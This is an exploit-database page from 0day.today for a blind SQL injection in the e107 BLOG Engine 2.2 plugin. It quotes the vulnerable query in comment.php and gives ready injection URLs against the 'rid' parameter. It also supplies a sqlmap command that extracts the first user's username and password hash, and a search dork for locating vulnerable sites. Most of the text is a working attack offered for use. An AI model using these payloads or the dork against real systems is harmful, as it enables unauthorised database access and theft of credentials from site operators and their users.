[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

e107 Plugin BLOG Engine 2.2 (rid) Blind SQL Injection Vulnerability

Author
Saime
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3005
Category
web applications
Date add
12-05-2008
Platform
unsorted
===================================================================
e107 Plugin BLOG Engine 2.2 (rid) Blind SQL Injection Vulnerability
===================================================================



[+] Author: Saime
[+] Script: e107 Plugin BLOG Engine v2.2 (rid) Blind SQL Injection
[+] Date: 13/05/2008
[+] Greetz: BaKo,DrWh4x,optiplex,xprog,cam-man-dan,Tulle,t0pP8uZz,Inspiratio,Novalok,illuz1oN,Untamed,GM,str0ke, and everyone else I forgot!

[+] Vuln File: comment.php
[+] Line: 22-24
$rid = $_GET['rid'];
//blog entry echo
$sql -> db_Query("select ".MPREFIX."macgurublog_rec.*, blog_enable from ".MPREFIX."macgurublog_rec left join ".MPREFIX."macgurublog_main on (".MPREFIX."macgurublog_rec.blogrec_uid=".MPREFIX."macgurublog_main.blog_uid) where blogrec_id=".$rid.";");
[+] Exploit:
http://site.com/e107_plugins/macgurublog_menu/comment.php?rid=1 and 1=1-- // returns no errors
http://site.com/e107_plugins/macgurublog_menu/comment.php?rid=1 and 1=2-- // returns error about unknown entry
http://site.com/e107_plugins/macgurublog_menu/comment.php?rid=1 and substring(@@version,1,1)=4 // check the mysql version. if 4 returns error, try 5.
Since e107 uses diffrent table names it's almost impossible to write exploit for it. So I am suggesting to use sqlmap to use this vulnerabilty.
The command like should look like this:
./sqlmap.py -u "URL" -p rid -a "./txt/user-agents.txt" -v1 --string "string which proofs the query is valid" -e "sql query"
Example:
./sqlmap.py -u "http://site.com/e107_plugins/macgurublog_menu/comment.php?rid=1" -p rid -a "./txt/user-agents.txt" -v1 --string "Saime" -e "<SELECT concat(username,0x3a,password) from e107_users where userid=1 limit 0,1>"
[+] Dork: inurl:/macgurublog_menu/
[+] Notes: Not to Turkish Warrior, good job on leaking CipherCrew exploits and submiting them as your own dumbass! ;)



#  0day.today [2024-12-24]  #